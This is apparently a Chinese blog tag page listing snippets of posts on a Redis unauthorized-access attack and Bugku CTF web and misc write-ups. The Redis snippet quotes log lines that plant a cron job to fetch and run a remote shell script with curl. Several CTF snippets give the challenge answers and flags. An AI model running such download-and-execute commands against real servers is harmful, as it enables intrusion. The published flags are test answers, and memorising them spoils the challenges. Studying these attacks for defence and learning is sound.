首页 > TAG信息列表 > 123.206

[日常] 研究redis未授权访问漏洞利用过程

前提:redis允许远程连接,不需要密码 1522057495.583846 [0 123.206.24.121:50084] "set" "dUHkp" "\n\n*/1 * * * * curl cdn.namunil.com/sh.php|sh\n" 1522057495.584467 [0 123.206.24.121:50084] "set" "yA" "\n\n*/2 *

CTF论剑厂Web(1)

1.web26            这道题很简单,绕过第一个if,进入第二个if即可 第一个if是判断str是否是数字,让它不为数字即可 第二个if上面的语句,=的级别高于and,所以只要num为数字而str不为数字即可 http://123.206.31.85:10026/?num=4&str=abc 上面是一直简单的情况‘ 2.web1 打开之

BugkuCTF 部分WP(搬运了很多WP)

WEB web2 http://123.206.87.240:8002/web2/ 右键或按F12查看源代码或者url前加view-source view-source:http://123.206.87.240:8002/web2/ 计算器 http://123.206.87.240:8002/yanzhengma/ F12 修改maxlength web基础$_GET http://123.206.87.240:8002/get/ GET传参 ?what=flag

Bugku的一道注入

继续补sqli的题     这道题与之前的题的区别是在第二部分中加了一道waf,所以需要特殊的手段来进行注入。  题目来源:http://123.206.87.240:9004/1ndex.php?id=1    第一部分  通过改变id值我们可以看页面内容的变化。5时提醒可以注入,6以后开始报error:      构造

BugKuCTF 杂项 这是一张单纯的图片

http://123.206.87.240:8002/misc/1.jpg 题解: 下载图片 记事本打开 HTML编码 解码 key{you are right}

CTF--web BugKu-ctf-web(1-10)

 1.web2 题目地址:http://123.206.87.240:8002/web2/ 查看网页源代码得到flag KEY{Web-2-bugKssNNikls9100} 2.计算器 题目地址:http://123.206.87.240:8002/yanzhengma/ 打开题目链接发现是简单的数学计算,但是只能输入一位数字 查看网页源码发现输入的maxlength=1 火狐浏览器f12,

Bugku-CTF之域名解析(听说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag)

Day 7 域名解析 50 听说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag       本题要点:  host配置文件       方法一: 修改hosts文件,路径为C:\Windows\System32\drivers\etc\hosts   在最底下添加: flag.bugku.com 120.24.86.145 保存 访问即可   方法二:   用